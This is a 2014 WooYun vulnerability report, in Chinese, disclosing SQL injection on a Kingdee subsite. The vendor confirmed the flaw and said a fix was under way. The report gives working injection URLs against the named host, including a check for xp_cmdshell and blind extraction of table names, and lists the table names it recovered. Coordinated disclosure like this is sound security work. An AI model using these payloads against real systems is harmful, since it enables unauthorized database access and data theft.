漏洞详情

披露状态:

2014-03-07: 细节已通知厂商并且等待厂商处理中
2014-03-07: 厂商已经确认,细节仅向厂商公开
2014-03-17: 细节向核心白帽子及相关领域专家公开
2014-03-27: 细节向普通白帽子公开
2014-04-06: 细节向实习白帽子公开
2014-04-21: 细节向公众公开

简要描述:

金蝶分站SQL注入

详细说明:

金蝶某分站存在SQL注入



注入点:http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986





http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=1

http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=2

http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=(Select/**/count(*)/**/FROM/**/master.dbo.sysobjects/**/Where/**/xtype='X'/**/AND/**/name='xp_cmdshell') 正常返回,xp_cmdshell存在



http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/(select/**/count(*)/**/from/**/master.dbo.sysdatabases)=7 (7个数据库)



http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and len((select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'))=21 (第一个数据库名字的长度为21)



http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and ASCII(substring((select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'),1,1))=84 (第一个数据库名字的第一个字符为T,依次猜解出数据库的名字)



http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/ substring((select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'),1,21)='T_ORG_ORGANIZATIONS_L' (第一个数据库名字:T_ORG_ORGANIZATIONS_L)



猜出的库名:

T_ORG_ORGANIZATIONS_L、T_KDS_RPT_L、Z_CDP_HISTORYAUTHORIZE_R、T_ORG_PRECHANGERULEENRY、T_ORG_PRECHANGERULEENTRY、T_BD_PRODUCTMODEL、T_META_FORMBILLLIST

漏洞证明:

注入存在性:

.PNG





写脚本跑了一下库名:

2.PNG

修复方案:

过滤

版权声明:转载请注明来源 clzzy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-03-07 19:52

厂商回复:

感谢 clzzy 兄台对金蝶的关注,这洞确实大了。老代码正在修复中,谢谢!

最新状态:

暂无


漏洞评价: